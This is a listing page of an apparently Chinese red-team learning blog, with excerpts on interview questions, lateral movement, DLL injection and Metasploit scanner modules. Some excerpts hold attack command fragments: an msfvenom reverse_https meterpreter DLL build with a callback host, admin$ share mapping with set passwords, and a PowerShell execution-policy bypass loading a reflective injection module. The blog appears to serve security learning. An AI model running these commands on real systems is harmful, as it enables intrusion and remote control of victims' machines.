InfoSec learning 
  • Home
  • Archives
  • Categories
  • Tags
  •   
root@whale3070:~# _

应届生的面试题(五)

长亭hw红队面试1.不出网有什么方法,正向shel l 方法除了reg之类的,还有什么? 2.域内委派 3.dpapi机制说下,能干嘛 4.fastjson 不出网 5.shiro漏洞类型,721原理,721利用要注意什么? 7.weblogic 漏洞类型都有啥,原理 8.dll劫持,dll注入 9.内网优先爆破测试的端口、为什么;如果只有3389开放,爆破3389的实际影响… 10.windo

2021-04-16
Interview
Interview

apt攻击技术学习指南

2021-04-09
mind-map
mind-map

老年人的生活

最近换了一份工作。也跟三十岁左右的男性打了一些交道,感受到岁月的残酷。 高铁上看着坐在我右边的某人头发上的白发;我以为某大佬三十多了(35以上)其实他才29;micro8在每篇文章中都说要多喝水,因为喝水喝少了,得了肾结石。 我们马上就要老了。 工作步入了正轨。 我已经完成了18岁的我的诺言,要成为一个会拉小提琴的黑客。 已经过去好多年了。大半夜的忽然有些感慨。原来我也是给能给新人指点迷津的老师傅

2021-04-08
experience
experience

横向移动:schtasks远程计划任务

视频教程:横向移动手法介绍 拓扑图 执行的命令1234567891011121314151617181920212223242526272829303132333435363738394041net user administrator 123456net user administrator qwe123!net use \\192.168.123.67\admin$ /user:"a

2021-04-04
windows
windows lateral-movement

反射式dll注入的演示

Powershell反射式dll注入 dll注入和反射式dll注入的区别合法进程 恶意dll 从本地或者dll调用 【生成恶意载荷,并执行web服务托管dll】 省略 【目标机器载入内存,使用反射式dll注入直接载入内存不落盘】 1234567PowerShell -Exec BypassImport-Module C:\Users\whale\Desktop\Invoke-Reflecti

2021-03-09
evasion
evasion

dll注入的演示

前景提要whale的DLLHijack本地提权教程 进程注入与迁移 本期内容dll注入的演示 1.exe 2.exe msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.123.138 lport=2333 -f dll -o whale.dll python -m SimpleHTTPServer 80 handler

2021-03-07
evasion
evasion

进程注入与迁移

进程注入与迁移 进程和线程的区别https://segmentfault.com/a/1190000039297639 进程,线程(公司)(人)卖食品、饮料、医疗、交通、房地产公司进程里有多个线程,就像一个公司里有多个员工 直接反弹shell的缺点: 进程注入的目的 进程的权限控制Integrity Levelhttps://blog.csdn.net/vlily/article/detai

2021-03-04
evasion
evasion

应届生的面试题(四)

面试题1234567891011121314151617181920212223241、绕WAF2、反序列化 fastjson3、流量加密4、XXE5、命令执行 php&java的区别6、溯源7、中间件8、代码审计7、注入8、SSRF9、内网要怎么打1.证书透明2.Windows的Redis主从RCE3.PTH怎么利用和NTML验证端口是什么4.git和svn,svn5.CS怎么联

2021-02-20
Interview
Interview

05-msf的泛微OA-rce扫描模块

写一个泛微OA的scanner扫描模块 这是python3的模块,使用方法是放到kali对应目录下:/usr/share/metasploit-framework/modules/auxiliary/scanner/http/weaver_e_cology_rce_scanner.py 12345678910111213141516171819202122232425262728293031323

2021-02-19
metasploit
metasploit

04-redis未授权扫描模块

需要的资料 msf开发文档 metasploit 脚本开发基础知识,ruby语法 Shodan搜索引擎介绍、以及如何在Linux命令行安装 redis未授权访问漏洞复现 课程结构 shodan被动信息搜集,寻找有redis服务的主机 metasploit改插件,判断是否存在redis漏洞 验证漏洞扫描结果 总结 录制的视频msf开发实践(一)redis未授权扫描模块 1234567891011

2021-02-10
metasploit
metasploit
1…6566676869…100

Search

Whale3070
总访问量 次 总访客数 人